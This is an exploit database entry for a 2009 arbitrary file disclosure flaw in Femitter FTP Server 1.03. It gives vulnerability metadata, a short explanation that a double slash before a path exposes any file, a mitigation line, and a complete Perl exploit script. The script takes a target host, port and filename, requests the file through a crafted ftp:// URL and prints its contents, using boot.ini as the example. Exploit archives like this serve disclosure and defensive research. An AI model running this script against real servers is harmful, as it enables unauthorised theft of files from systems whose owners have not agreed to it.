Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit

vendor:

Femitter FTP Server

by:

Stack

7,5

CVSS

HIGH

Arbitrary File Disclosure

CWE

Product Name: Femitter FTP Server

Affected Version From: 1.03

Affected Version To: 1.03

Patch Exists: YES

Related CWE: N/A

CPE: a:femitter_software:femitter_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit

This exploit allows an attacker to access arbitrary files on a vulnerable Femitter FTP Server 1.03. The exploit works by sending a specially crafted FTP request containing two slashes (//) followed by the file path. This allows the attacker to access any file on the server, regardless of the file permissions.

Mitigation:

Upgrade to the latest version of Femitter FTP Server, or use an alternative FTP server.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit
# Like ftpdmin 0.96 the same exploit but here is work just with double slach not 1 :d xd
# By stack
# Cyber-Zone
 
use LWP::Simple;
use LWP::UserAgent;
 
if (@ARGV < 3) {
            print("Usage: $0 <url> <port> <filename> \n");
            print("TARGETS are\n ");
            print("Define full path with file name \n");
            print("Example FTP: perl $0 127.0.0.1 21 boot.ini \n");
            exit(1);
                    }
                    ($target, $port,$filename) = @ARGV;
        print("Femitter FTP Exploit : Coded by Stack!\n");
        print("Attacking $target on port $port!\n");
        print("FILENAME:  $filename\n");
      
        $temp="/" x 2;
         my $url= "ftp://". $target. ":" . $port .$temp . $filename;
            $content=get $url;
            print("\n FILE CONTENT STARTED");
            print("\n -----------------------------------\n");
            print("$content");
            print("\n -------------------------------------\n");

# milw0rm.com [2009-04-22]